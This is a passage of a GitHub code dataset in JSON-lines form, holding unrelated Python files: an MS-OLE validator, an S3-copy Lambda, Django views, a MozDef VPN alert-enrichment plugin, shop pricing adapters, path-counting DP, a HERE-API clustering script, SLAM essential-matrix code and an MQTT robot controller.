sector_raw = self._Read(sector_size)\n if len(sector_raw) < sector_size:\n break\n try:\n sector = array.array(\"l\", sector_raw)\n except ValueError:\n self.is_valid = False\n break\n msat_secid = sector[-1]\n self.msat.extend(sector[:-1])\n self.msat_secids.append(msat_secid)\n # We filter the MSAT to validate its length, everything higher than -1 is a valid\n # MSAT sector - then we compare against the CDH information.\n self.msat = filter(self._FilterCDH, self.msat)\n self.max_sector = len(self.msat) * (self.sector_size / 4)\n self.is_valid = self.is_valid and (len(self.msat) == self.sat_secs)\n #self.is_valid = self.is_valid and (filter(lambda(x): x < -2, msat) == [])\n self.is_valid = self.is_valid and (filter(self._FilterMsat, self.msat) == [])\n if self.is_valid and not self.eof:\n # Now we go through the SAT looking for sectors with value -3, and verifying that\n # they are also present in the MSAT. If we find a mismatch, that means we have a\n # corrupt file.\n # We also check for -4 in the SAT, which are MSAT sectors. Also, as a first check\n # we look for values lower than -4 or higher than self.max_sector, because they\n # are signs of a corrupt file.\n base_sector = 0\n base_sector_inc = self.sector_size / 4\n x_index = 0\n len_msat = len(self.msat)\n file_location = 512\n while self.is_valid and (x_index < len_msat) and not self.eof:\n x = self.msat[x_index]\n self._SetValidBytes(file_location + self.sector_size)\n file_location = 512 + (x * self.sector_size)\n try:\n self.pos = file_location\n #self.fd.seek(file_location)\n except IOError:\n self.is_valid = False\n break\n sector_raw = self._Read(self.sector_size)\n if len(sector_raw) < self.sector_size:\n self.is_valid = False\n break\n try:\n sector = array.array(\"l\", sector_raw)\n except ValueError:\n self.is_valid = False\n break\n #self.is_valid = filter(lambda(x): x < -4, sector) == []\n self.is_valid = filter(self._FilterSat, sector) == []\n sat_len = len(self.sat_dict)\n clean_sector = filter(self._FilterCDH, sector)\n self.sat_dict.update({}.fromkeys(clean_sector, True))\n self.is_valid = self.is_valid and len(self.sat_dict) == sat_len + len(clean_sector)\n if not self.is_valid:\n break\n self.sat.extend(sector)\n for key, val in enumerate(sector, base_sector):\n if val == -3:\n if not(key in self.msat):\n self.is_valid = False\n break\n elif val == -4:\n if not(key in self.msat_secids):\n self.is_valid = False\n break\n base_sector += base_sector_inc\n x_index += 1\n else:\n pass\n #print \"Bad MSAT.\"\n else:\n pass\n if self.is_valid and (x_index == self.sat_secs) and sector and not self.eof:\n # Validation is over and we analyzed the entire SAT. sector still has the contents of\n # the last SAT-sector. We will do a last step to calculate the real file size out of\n # this information:\n # We will reverse sector, and look for the first non -1 value in it, which is the last\n # assigned sector that the SAT has information about. We can't look for the first -1\n # found in sector because a MS-OLE valid file could have a -1 from a freed sector and\n # we'd be cutting short the file.\n last_sat = sector[:]\n last_sat.reverse()\n x = 0\n b = last_sat[x]\n while b == -1 and x < len(last_sat) - 1:\n x += 1\n b = last_sat[x]\n free_secs = x\n sat_secs = self.sat_secs\n sector_size = self.sector_size # assign this variables for shortness un the next calc\n bytes_last_valid = 512 + ((((sat_secs - 1) * (sector_size / 4)) * sector_size)\n + (((sector_size / 4) - free_secs) * sector_size))\n self._SetValidBytes(bytes_last_valid)\n self.end = True\n else:\n self.is_valid = False\n self._GetExtension()\n return self.is_valid # and not(self.eof) # this was semantically flawed","repo_name":"info-lab/FileValidators","sub_path":"FileValidators/MSOLEValidator.py","file_name":"MSOLEValidator.py","file_ext":"py","file_size_in_byte":11324,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"10604183338","text":"import json\nimport logging\nimport boto3\nfrom pathlib import Path\nfrom urllib.parse import urlparse\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\ns3_client = boto3.client('s3')\ns3 = boto3.resource('s3')\n\ndef remove_prefix(text, prefix):\n return text[text.startswith(prefix) and len(prefix):]\n \ndef write_input_output(input_path, output_path):\n input_bucket, input_key = input_path.replace(\"s3://\", \"\").split(\"/\", 1)\n output_bucket, output_key = output_path.replace(\"s3://\", \"\").split(\"/\", 1)\n\n print(input_bucket)\n print(input_key)\n s3_input_bucket = s3.Bucket(input_bucket)\n if input_key.endswith(\"/\"):\n for obj in s3_input_bucket.objects.filter(Prefix=input_key):\n copy_source = {\n 'Bucket': input_bucket,\n 'Key': obj.key\n } \n \n destination_key = remove_prefix(obj.key, input_key)\n if len(destination_key) > 0:\n destination_key = output_key + destination_key\n print(f\"Copying object to {output_bucket}/{destination_key}\")\n s3_client.copy(copy_source, output_bucket, destination_key)\n else:\n if \"/\" in input_key:\n destination_key = output_key + input_key.split(\"/\")[-1]\n else:\n destination_key = output_key + input_key\n\n copy_source = {\n 'Bucket': input_bucket,\n 'Key': input_key\n }\n print(f\"Copying object to {output_bucket}/{destination_key}\")\n s3_client.copy(copy_source, output_bucket, destination_key)\n\ndef lambda_handler(event, context):\n \"\"\"\n Example of a NoOp pipeline\n Uploads input file to output\n \"\"\"\n print(event)\n if isinstance(event['body'], str):\n data = json.loads(event['body'])\n else:\n data = event['body']\n\n write_input_output(data['inputPath'], data['outputPath'])\n return {\n 'statusCode': 200, \n 'body': 'Success'\n }","repo_name":"awslabs/visual-asset-management-system","sub_path":"infra/lib/artefacts/sample_lambda_pipeline/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"61"} +{"seq_id":"31132802607","text":"from django.http import HttpRequest\nfrom django.shortcuts import redirect, render\nfrom django.contrib import messages\n\n\nfrom app.models import Exetat\nfrom app.forms import ExetatForm\n\n\ndef index(request):\n assert isinstance(request, HttpRequest)\n exetats = Exetat.objects.all()\n return render(\n request,\n 'app/organisateur/templates/exetats/index.html',\n {\n 'exetats': exetats\n }\n )\n \ndef add(request):\n if request.method == 'GET' :\n form = ExetatForm()\n \n return render(\n request, \n 'app/organisateur/templates/exetats/add.html',\n {\n 'form': form\n }\n )\n \ndef store(request):\n if request.method == 'POST':\n form = ExetatForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, \"L'Edition' a été enregistrée avec succès !\")\n else :\n messages.success(request, form.errors)\n return redirect('/organisateur/templates/exetats')\n \ndef update(request, id):\n if request.method == 'POST':\n if id == 0:\n form = ExetatForm(request.POST)\n else:\n category = Exetat.objects.get(pk=id)\n form = ExetatForm(request.POST, instance=category)\n if form.is_valid():\n form.save()\n messages.success(request, \"La commune a été modifiée avec succès !\")\n return redirect('/organisateur/templates/exetats')\n\ndef edit(request, id):\n assert isinstance(request, HttpRequest)\n if request.method == 'GET':\n if id == 0:\n form = ExetatForm()\n else:\n exetat = Exetat.objects.get(pk=id)\n form = ExetatForm(instance=exetat)\n return render(\n request,\n 'app/organisateur/templates/exetats/edit.html',\n {\n 'form': form,\n }\n )\n\ndef delete(request, id):\n exetat = Exetat.objects.get(pk=id)\n exetat.delete()\n messages.success(request, \"L'Edition a été supprimée avec succès !\")\n return redirect('/organisateur/templates/exetats')\n\n","repo_name":"lysbernice/Stage_roject","sub_path":"app/views/exetats.py","file_name":"exetats.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16932948965","text":"import json\nimport os\nimport typing as types\n\nimport netaddr\n\nfrom lib.config import ES\nfrom mozdef_util.elasticsearch_client import ElasticsearchClient\nfrom mozdef_util.query_models import SearchQuery, TermMatch, PhraseMatch\nfrom mozdef_util.utilities.toUTC import toUTC\n\n\nCONFIG_FILE = os.path.join(\n os.path.dirname(__file__),\n __file__.replace('py', 'json'),\n)\n\n\n# TODO: Switch to dataclass when we adopt Python 3.7+\n\nclass Config(types.NamedTuple):\n '''Expected configuration for the plugin, loaded from JSON.\n '''\n\n indices_to_search: types.List[str]\n search_window_hours: int\n vpn_ip_cidrs: types.List[str]\n\n def load(file_path: str) -> 'Config':\n '''Attempt to parse a configuration from a JSON file.\n '''\n\n with open(file_path) as cfg_file:\n return Config(**json.load(cfg_file))\n\n\nclass message(object):\n '''Alert plugin that handles any alert and attempts to enrich it with\n information about VPN IP address assignments.\n\n This plugin will add the following fields to the alert:\n\n ```json\n {\n \"details\": {\n \"vpnassignment\": {\n \"username\": \"user@mozilla.com\",\n \"originalip\": \"1.2.3.4\",\n }\n }\n }\n ```\n '''\n\n def __init__(self):\n self.registration = ['*']\n\n self.config = Config.load(CONFIG_FILE)\n\n # Create a closure around an Elasticsearch client that can be invoked\n # with search terms to find events in the configured indices.\n es_client = ElasticsearchClient(ES['servers'])\n\n def search_fn(query):\n return query.execute(\n es_client,\n indices=self.config.indices_to_search,\n ).get('hits', [])\n\n self.search = search_fn\n\n def onMessage(self, msg):\n return enrich(\n msg,\n self.config.search_window_hours,\n self.config.vpn_ip_cidrs,\n self.search,\n )\n\n\ndef enrich(\n alert: dict,\n search_window_hours: int,\n vpn_ip_cidrs: types.List[str],\n search_fn: types.Callable[[SearchQuery], types.List[dict]],\n) -> dict:\n '''Search for events that describe an assignment of a VPN IP address to\n the sourceipaddress in an alert.\n '''\n\n details = alert.get('details', {})\n\n source_ip = details.get('sourceipaddress')\n\n if source_ip is None:\n return alert\n\n if netaddr.IPAddress(source_ip) not in netaddr.IPSet(vpn_ip_cidrs):\n return alert\n\n search_vpn_assignment = SearchQuery({\n 'hours': search_window_hours,\n })\n search_vpn_assignment.add_must([\n TermMatch('tags', 'vpn'),\n TermMatch('tags', 'netfilter'),\n TermMatch('details.success', 'true'),\n TermMatch('details.vpnip', source_ip),\n PhraseMatch('summary', 'netfilter add upon connection'),\n ])\n\n assign_events = sorted(\n [hit.get('_source', {}) for hit in search_fn(search_vpn_assignment)],\n key=lambda evt: toUTC(evt['utctimestamp']),\n reverse=True, # Sort into descending order from most recent to least.\n )\n\n if len(assign_events) == 0:\n return alert\n\n event = assign_events[0]\n\n details['vpnassignment'] = {\n 'username': event['details']['username'],\n 'originalip': event['details']['sourceipaddress'],\n }\n\n alert['details'] = details\n\n return alert\n","repo_name":"mozilla/MozDef","sub_path":"alerts/plugins/vpn_assignment.py","file_name":"vpn_assignment.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":2170,"dataset":"github-code","pt":"61"} +{"seq_id":"21788974754","text":"# zope imports\nfrom zope.interface import implements\nfrom zope.component import adapts\n\n# easyshop imports\nfrom easyshop.core.interfaces import IPrices\nfrom easyshop.core.interfaces import IProduct\nfrom easyshop.core.interfaces import IProductVariant\nfrom easyshop.core.interfaces import IProductVariantsManagement\nfrom easyshop.core.interfaces import IShopManagement\nfrom easyshop.core.interfaces import ITaxes\n\nclass ProductPrices(object):\n \"\"\"Provides IPrices for product content object.\n \"\"\"\n implements(IPrices)\n adapts(IProduct)\n\n def __init__(self, context):\n \"\"\"\n \"\"\"\n pvm = IProductVariantsManagement(context)\n shop = IShopManagement(context).getShop()\n \n self.context = context\n\n self.gross_prices = shop.getGrossPrices()\n self.has_variants = pvm.hasVariants()\n self.taxes = ITaxes(context)\n\n if self.has_variants:\n self.product_variant = \\\n pvm.getSelectedVariant() or pvm.getDefaultVariant()\n \n def getPriceForCustomer(self, effective=True, variant_price=True):\n \"\"\"\n \"\"\"\n if self.has_variants and variant_price and \\\n self.product_variant.getPrice() != 0:\n return IPrices(self.product_variant).getPriceForCustomer(effective)\n else:\n if effective == True:\n return self._getEffectivePriceForCustomer()\n else:\n return self._getStandardPriceForCustomer()\n \n def getPriceNet(self, effective=True, variant_price=True):\n \"\"\"\n \"\"\"\n if self.has_variants and variant_price and \\\n self.product_variant.getPrice() != 0:\n return IPrices(self.product_variant).getPriceNet(effective)\n else:\n if effective == True:\n return self._getEffectivePriceNet()\n else:\n return self._getStandardPriceNet()\n\n def getPriceGross(self, effective=True, variant_price=True):\n \"\"\"\n \"\"\"\n if self.has_variants and variant_price and \\\n self.product_variant.getPrice() != 0:\n return IPrices(self.product_variant).getPriceGross(effective)\n else:\n if effective == True:\n return self._getEffectivePriceGross()\n else:\n return self._getStandardPriceGross()\n\n # Effective Price\n def _getEffectivePriceForCustomer(self):\n \"\"\"Returns the effective price for customer, dependend of the product \n is for sale or not.\n \"\"\"\n tax_abs_customer = self.taxes.getTaxForCustomer()\n return self._getEffectivePriceNet() + tax_abs_customer\n\n def _getEffectivePriceNet(self):\n \"\"\"Returns the effective price for customer, dependend of the product \n is for sale or not.\n \"\"\"\n if self.context.getForSale() == True:\n price = self.context.getSalePrice()\n else:\n price = self.context.getPrice()\n \n if self.gross_prices == True:\n return price - self.taxes.getTax()\n else:\n return price\n\n def _getEffectivePriceGross(self):\n \"\"\"Returns the effective price for customer, dependend of the product \n is for sale or not.\n \"\"\"\n if self.context.getForSale() == True:\n price = self.context.getSalePrice()\n else:\n price = self.context.getPrice()\n \n if self.gross_prices == True:\n return price\n else:\n return price + self.taxes.getTax()\n\n # Standard Price\n def _getStandardPriceForCustomer(self):\n \"\"\"Returns always the standard price, independent of the product is for \n sale or not. We need this in any case to display the standard price \n (e.g. stroked).\n \"\"\"\n tax_abs_customer = self.taxes.getTaxForCustomer(False)\n return self._getStandardPriceNet() + tax_abs_customer\n\n def _getStandardPriceNet(self):\n \"\"\"Returns always the standard price, independent of the product is for \n sale or not. We need this in any case to display the standard price \n (e.g. stroked).\n \"\"\"\n if self.gross_prices == True:\n return self.context.getPrice() - self.taxes.getTax(False)\n else:\n return self.context.getPrice()\n\n def _getStandardPriceGross(self):\n \"\"\"Returns always the standard price, independent of the product is for \n sale or not. We need this in any case to display the standard price \n (e.g. stroked).\n \"\"\"\n if self.gross_prices == True:\n return self.context.getPrice()\n else:\n return self.context.getPrice() + self.taxes.getTax(False)\n \nclass ProductVariantPrices(ProductPrices):\n \"\"\"Provides IPrices for product variant content object.\n \"\"\"\n implements(IPrices)\n adapts(IProductVariant)\n\n def __init__(self, context):\n \"\"\"\n \"\"\"\n super(ProductVariantPrices, self).__init__(context)\n self.parent = self.context.aq_inner.aq_parent\n\n def getPriceForCustomer(self, effective=True):\n \"\"\"\n \"\"\"\n if self.context.getPrice() != 0:\n base = super(ProductVariantPrices, self)\n return base.getPriceForCustomer(effective)\n else:\n return IPrices(self.parent).getPriceForCustomer(variant_price=False)\n \n def getPriceNet(self, effective=True):\n \"\"\"\n \"\"\"\n if self.context.getPrice() != 0:\n base = super(ProductVariantPrices, self)\n return base.getPriceNet(effective)\n else:\n return IPrices(self.parent).getPriceNet(variant_price=False)\n\n def getPriceGross(self, effective=True):\n \"\"\"\n \"\"\"\n if self.context.getPrice() != 0:\n base = super(ProductVariantPrices, self)\n return base.getPriceGross(effective)\n else:\n return IPrices(self.parent).getPriceGross(variant_price=False)","repo_name":"ned14/Easyshop","sub_path":"src/easyshop.catalog/easyshop/catalog/adapters/prices.py","file_name":"prices.py","file_ext":"py","file_size_in_byte":6050,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"61"} +{"seq_id":"2040285828","text":"\nfrom time import time\n\n# Brute force way!\n\nn = 10\n\n\ndef countPaths(row: int = 0, col: int = 0) -> int:\n\n if row >= n or col >= n:\n return 0\n\n if row == n - 1 and col == n - 1:\n return 1\n\n return countPaths(row + 1, col) + countPaths(row, col + 1)\n\n\nstart_time = time()\nres = countPaths()\ndiff1 = time() - start_time\nprint(\"# ways: \", res, \" Time taken without cache: \", diff1)\n\n\n# Memoization\n# Top Down Approach\n\ncache = {}\n\n\nn = 10\n\n\ndef countPaths2(row: int = 0, col: int = 0) -> int:\n\n if row >= n or col >= n:\n return 0\n\n if (row, col) in cache:\n return cache[(row, col)]\n\n if row == n - 1 and col == n - 1:\n return 1\n\n cache[(row, col)] = countPaths2(row + 1, col) + countPaths2(row, col + 1)\n return cache[(row, col)]\n\n\nstart_time = time()\nres = countPaths2()\ndiff2 = time() - start_time\nprint(\"# ways: \", res, \" Time taken with cache: \", diff2)\n\n\n# Bottom Up approach\n\nn = 10\nm = 10\n\n\ndef countPaths3():\n\n # init\n r1 = [0] * m\n r1[-1] = 1\n\n for _ in range(n):\n r2 = [1] * m\n for index in range(m-2, -1, -1):\n r2[index] = r1[index] + r2[index + 1]\n\n r1 = r2\n\n return r2[0]\n\n\nstart_time = time()\nres = countPaths3()\ndiff3 = time() - start_time\nprint(\"# ways: \", res, \" Time taken with cache: \", diff3)\n\nprint(min(diff1, diff2, diff3))\n","repo_name":"aryanjain28/DSA","sub_path":"2dProgramming.py","file_name":"2dProgramming.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"26089733175","text":"class Solution:\n def maxResult(self, nums: List[int], k: int) -> int:\n n = len(nums)\n dp = [0] * n\n dp[n - 1] = nums[n - 1]\n heap = []\n heapq.heappush(heap, (-nums[n - 1], n - 1))\n for i in range(n - 2, -1, -1):\n while True:\n if i + k >= heap[0][1]:\n dp[i] = nums[i] + heap[0][0] * -1\n heapq.heappush(heap, (-dp[i], i))\n break\n else:\n heapq.heappop(heap)\n return dp[0]\n # dp = [0] * n\n# dp[0] = nums[0]\n# for i in range(1, n):\n# maxScore = 0\n# for j in range(1, k + 1):\n# if i - j < 0: continue\n \n# maxScore = max(maxScore, dp[i - j])\n# dp[i] = maxScore + nums[i]\n# print(dp)","repo_name":"Rediet-Ferew/competitive-programming","sub_path":"1696-jump-game-vi/1696-jump-game-vi.py","file_name":"1696-jump-game-vi.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29741626192","text":"import osmnx as ox\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport math\nimport json\nfrom shapely.geometry import Point,Polygon\nimport herepy\nfrom time import perf_counter\nimport copy\nfrom math import *\n\nroutingApi = herepy.RoutingApi('api key')\n\nville = 'Bordeaux, France'\ncs = '[out:json][timeout:600]'\nname = 'Bordeaux_cluster.json'\n\ncolour_code = [\n '#566D7E', '#000080', '#357EC7', '#3BB9FF', '#ADDFFF', '#7FFFD4',\n '#3EA99F', '#728C00', '#52D017', '#00FF00', '#FFFF00', '#FFD801',\n '#FFA62F', '#D4A017', '#B87333', '#966F33', '#6F4E37', '#C36241',\n '#CC6600', '#F87217', '#F9966B', '#E77471', '#FF0000', '#9F000F',\n '#7D0552', '#7F525D', '#EDC9AF', '#FAAFBE', '#F778A1', '#F52887',\n '#FF00FF', '#4B0082', '#A74AC7', '#8E35EF'\n ]\n\nville_street = ox.graph_from_place(ville, timeout = 1500, network_type = 'drive')\nnodes, edges = ox.graph_to_gdfs(ville_street)\n\nfile2 = open(\"data/json/contours-iris_Bordeaux.json\", \"r\", encoding='utf-8')\ndata = json.load(file2)\n\nfig, ax = plt.subplots()\nfig, ax2 = plt.subplots()\n\nedges.plot(ax = ax2, linewidth = 0.7, edgecolor = 'black')\n\nj = 0\ncompt = 0\nlong = 0\nid_index = 0\ndict = []\nmatrices = []\nall_points = []\n\nfor dat in data:\n if 'Bordeaux' in dat['fields']['nom_com']: # If not Bordeaux, you must add a space at the end : 'Paris '\n\n print(dat['fields']['nom_com'])\n compt += 1\n print (compt)\n if j == (np.size(colour_code) -1):\n j = 0\n j += 1\n\n if np.size(dat['fields']['geo_shape']['coordinates']) == 2:\n range_dat = 2\n else:\n range_dat = 1\n\n for i in range(0, range_dat):\n #try:\n t = 0\n if range_dat == 2:\n try:\n poly = Polygon(dat['fields']['geo_shape']['coordinates'][i][0])\n except:\n poly = Polygon(dat['fields']['geo_shape']['coordinates'][i])\n else:\n poly = Polygon(dat['fields']['geo_shape']['coordinates'][0])\n try:\n g = ox.graph_from_polygon(poly, network_type='drive', clean_periphery=True, retain_all=True, truncate_by_edge=True)\n except:\n print('')\n print('NO GRAPH IN TAHT ONE')\n print('')\n\n n, e = ox.graph_to_gdfs(g)\n\n e.plot(ax = ax, linewidth = 0.7, edgecolor = colour_code[j])\n for i in range(0, int(np.size(e) / np.size(e.iloc[0]) - 1)):\n id_index += 1\n rue = {\n 'id' : id_index,\n 'u' : int(e.iloc[i]['u']),\n 'v' : int(e.iloc[i]['v']),\n 'cluster_number' : compt\n }\n dict.append(rue)\n\n\n points = []\n sizing = int(np.size(n) / np.size(n.iloc[0]))\n for i in range(0, sizing):\n points.append([n.iloc[i]['y'], n.iloc[i]['x']])\n\n print (points)\n print(np.size(points))\n all_points.append(points)\n count = 0\n tic = perf_counter()\n matice_test = []\n for k in range(0, sizing):\n\n matrix = []\n count = ceil(sizing/100)\n for l in range(0, count):\n bool = False\n while bool == False:\n try :\n response = routingApi.matrix(\n start_waypoints = [points[k]],\n destination_waypoints = points[l*100:min(sizing, 100 + l*100)],\n departure='2020-07-01T13:38:00+02',\n modes=[herepy.RouteMode.fastest, herepy.RouteMode.car]\n )\n bool = True\n except:\n bool = False\n print('Nope')\n\n # Must create a temp file in order to work with the response from Here.\n f = open(\"data/json/temp.json\", \"w\")\n c = copy.copy(response)\n f.write(str(c))\n f.close()\n file = open(\"data/json/temp.json\", \"r\", encoding='utf-8')\n data = json.load(file)\n for rep in data['response']['matrixEntry']:\n matrix.append(rep['summary']['travelTime'])\n\n\n matice_test.append(matrix)\n\n matrices.append(matice_test)\n toc = perf_counter()\n t += toc - tic\n\n print(f\"it took {t} seconde to get this matrix\")\n\n #except:\n # print('')\n # print('POLYGON BUG')\n # print('')\n\n\nj = json.dumps(dict, indent=4, sort_keys=True, ensure_ascii=False)\nf = open(name, \"w\")\nf.write(j)\nf.close()\n\nf = open(\"data/json/matrices_Bordeaux.json\", \"w\")\nf.write(f\"{matrices}\")\nf.close()\n\nf = open(\"data/json/points_Bordeaux.json\", \"w\")\nf.write(f\"{all_points}\")\nf.close()\n\n\n\nprint('')\nprint(int(np.size(edges) / np.size(edges.iloc[0])))\n\nplt.show()\n","repo_name":"mgaury/NetworkBuilder","sub_path":"cluster_IRIS.py","file_name":"cluster_IRIS.py","file_ext":"py","file_size_in_byte":5354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13936377865","text":"'''\nVisual Monocular SLAM Implementation\nCreated: Sept 10, 2019\nAuthor: Michael Liu (GURU AI Group, UCSD)\n'''\n\nimport numpy as np \nfrom .triangulation import LinearTriangulation\nfrom .utils import *\n\n'''\nMinimum Solver for Essential Matrix: currently using skimage.transform.EssentialMatrixTransform\nDLT for Essential Matrix: direct linear transform for essential matrix\n'''\ndef DLT_E(norm_x1, norm_x2, normalize=True):\n # Inputs:\n # x1 - homogeneous normalized correspondences in image 1\n # x2 - homogeneous normalized correspondences in image 2\n # normalize - if True, apply data normalization to x1 and x2\n #\n # Outputs:\n # E - the DLT estimate of the essential matrix \n \n # points normalization with calibration matrix\n print(\"normalized points shape: {}\".format(norm_x1.shape))\n assert norm_x1.shape[0] == 3\n x1, x2 = np.matrix(Dehomogenize(norm_x1)), np.matrix(Dehomogenize(norm_x2))\n # data normalization\n if normalize:\n x1, T1 = Normalize(x1)\n x2, T2 = Normalize(x2)\n else:\n x1 = Homogenize(x1)\n x2 = Homogenize(x2)\n A = np.zeros((0, 9))\n for i in range(x1.shape[1]):\n Ai = np.kron(x2[:, i].T, x1[:, i].T)\n A = np.vstack((A, Ai))\n f = RightNull(A)\n E = f.reshape(3, 3)\n u, d, vt = np.linalg.svd(E)\n d[2] = 0\n print('diag: {}'.format(d))\n a, b = d[0], d[1]\n d[0] = d[1] = (a+b)/2\n E = u @ np.diag(d) @ vt\n # data denormalization\n if normalize:\n E = T2.T @ E @ T1\n E_norm = E / np.linalg.norm(E)\n return E_norm\n\ndef DLT_F(x1, x2, normalize=True):\n assert x1.shape[0] == 3\n x1, x2 = np.matrix(Dehomogenize(x1)), np.matrix(Dehomogenize(x2))\n # data normalization\n if normalize:\n x1, T1 = Normalize(x1)\n x2, T2 = Normalize(x2)\n else:\n x1 = Homogenize(x1)\n x2 = Homogenize(x2)\n A = np.zeros((0, 9))\n for i in range(x1.shape[1]):\n Ai = np.kron(x2[:, i].T, x1[:, i].T)\n A = np.vstack((A, Ai))\n f = RightNull(A)\n F = f.reshape(3, 3)\n u, d, vt = np.linalg.svd(F)\n d[2] = 0\n print('diag: {}'.format(d))\n # a, b = d[0], d[1]\n # d[0] = d[1] = (a+b)/2\n F = u @ np.diag(d) @ vt\n # data denormalization\n if normalize:\n F = T2.T @ F @ T1\n F_norm = F / np.linalg.norm(F)\n return F_norm\n\n'''\nDecompose Essential Matrix into four solutions\n- inputs:\n - x1, x2 are one 2d correspondence\n - E is essential matrix that is ready to be decomposed\n- ouput:\n - P1=[I|0], P2\n'''\ndef Decompose_Essential(E, x1, x2, mode='matrix'):\n '''\n X is the reconstructed homogeneous 3D point\n Cheirality (Richard I. Harley) tests whether the reconstructed point is in front of the camera pose\n '''\n def cheirality(P, X):\n assert X.shape == (4, 1)\n w = P[2, :] @ X\n return w * X[-1,0] * np.linalg.det(P[:, :3]) > 0\n\n def decompose(E):\n U, d, Vt = np.linalg.svd(E)\n Z = np.matrix([[0, -1, 0],[1, 0, 0],[0, 0, 1]])\n R1, R2 = U @ Z @ Vt, U @ Z.T @ Vt\n t1, t2 = U[:, -1], -U[:, -1]\n if np.linalg.det(R1) < 0:\n R1 = -R1\n if np.linalg.det(R2) < 0:\n R2 = -R2\n return R1, R2, t1, t2\n\n def decompose_matrix(E):\n U, d, Vt = np.linalg.svd(E)\n W = np.matrix([[0, -1, 0], [1, 0, 0], [0, 0, 1]])\n Z = np.matrix([[0, 1, 0], [-1, 0, 0], [0, 0, 0]])\n T = U @ Z @ U.T\n R1 = U @ W @ Vt\n R2 = U @ W.T @ Vt\n if np.linalg.det(R1) < 0:\n R1 = -R1\n if np.linalg.det(R2) < 0:\n R2 = -R2\n t = np.zeros((3,1))\n t[0, 0] = T[2, 1]\n t[1, 0] = T[0, 2]\n t[2, 0] = T[1, 0]\n # print('R1: {}, R2: {}'.format(R1, R2))\n # print('det(R1): {}, det(R2): {}'.format(np.linalg.det(R1), np.linalg.det(R2)))\n # print('t1: {}, t2: {}'.format(t, -t))\n return R1, R2, t, -t\n\n R1, R2, t1, t2 = None, None, None, None\n if mode == 'matrix':\n R1, R2, t1, t2 = decompose_matrix(E)\n else:\n R1, R2, t1, t2 = decompose(E)\n # Canonical Camera Matrix\n P0 = np.hstack((np.eye(3), np.zeros((3,1))))\n P_prime = None\n not_essential_count = 0\n # Four Possible Solutions\n P1 = np.concatenate((R1, t1), axis=1)\n P2 = np.concatenate((R1, t2), axis=1)\n P3 = np.concatenate((R2, t1), axis=1)\n P4 = np.concatenate((R2, t2), axis=1)\n max_inliers = 0\n for P in [P1, P2, P3, P4]:\n # testing chirality of Triangulation\n inlier = 0\n for i in range(x1.shape[1]):\n X = LinearTriangulation(x1[:, i], x2[:, i], P0, P)\n if cheirality(P0, X) and cheirality(P, X):\n inlier += 1\n if max_inliers < inlier:\n max_inliers = inlier\n P_prime = P\n assert P_prime is not None\n return P0, P_prime\n\ndef Project_Essential(I, P2, Rt):\n R, t = Rt[:, :3], Rt[:, -1].reshape(-1,1)\n I, O = I[:, :3], I[:, -1].reshape(-1,1)\n R2, t2 = P2[:, :3], P2[:, -1].reshape(-1,1)\n P1 = np.hstack((R @ I, O + t))\n P3 = np.hstack((R @ R2, t2 + t))\n return P1, P3\n\ndef Compose_Essential(P1, P2):\n R1, t1 = P1[:, :3], P1[:, -1]\n R2, t2 = P2[:, :3], P2[:, -1]\n R, t = R2 @ R1.T, t2.reshape(-1,1) - t1.reshape(-1,1)\n E = Skew(t.reshape(-1, 1)) @ R\n return E","repo_name":"iosmichael/slamulance","sub_path":"geometry/essential.py","file_name":"essential.py","file_ext":"py","file_size_in_byte":5300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13324069241","text":"#!/usr/bin/env python3\nimport paho.mqtt.client as mqtt # import the client\nimport pygame\nimport time\n\nFPS = 24\npygame.init()\npygame.display.set_caption(\"Control System\")\n\n# Connect to broker\nbroker_address = \"localhost\" # 192.168.0.3\nclient = mqtt.Client(\"Master\")\nclient.connect(broker_address)\n\n# client.on_connect = on_connect\n# client.on_message = on_message\n\nLength, Width, Height = 41.91, 55.88, 30 # cm\n\n# Setup pygame\nSCREEN_WIDTH = 500\nSCREEN_HEIGHT = 300\n\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n\nclock = pygame.time.Clock()\n\nrunning = True\nd_pad_held = [False, False, False, False]\nbutton_held = [False, False]\nspeed = 25\nwhile running:\n client.loop(timeout=.1)\n # - events -\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n d_pad_held[0] = True\n if event.key == pygame.K_RIGHT:\n d_pad_held[1] = True\n if event.key == pygame.K_UP:\n d_pad_held[2] = True\n if event.key == pygame.K_DOWN:\n d_pad_held[3] = True\n if event.key == pygame.K_LSHIFT:\n speed = 75\n if event.key == pygame.K_a:\n button_held[0] = True\n if event.key == pygame.K_s:\n button_held[1] = True\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT:\n d_pad_held[0] = False\n if event.key == pygame.K_RIGHT:\n d_pad_held[1] = False\n if event.key == pygame.K_UP:\n d_pad_held[2] = False\n if event.key == pygame.K_DOWN:\n d_pad_held[3] = False\n if event.key == pygame.K_LSHIFT:\n speed = 25\n if event.key == pygame.K_a:\n button_held[0] = False\n if event.key == pygame.K_s:\n button_held[1] = False\n\n if d_pad_held[0]:\n client.publish(\"A\", str(speed)[:4])\n client.publish(\"B\", str(-speed)[:4])\n elif d_pad_held[1]:\n client.publish(\"A\", str(-speed)[:4])\n client.publish(\"B\", str(speed)[:4])\n elif d_pad_held[2]:\n client.publish(\"A\", 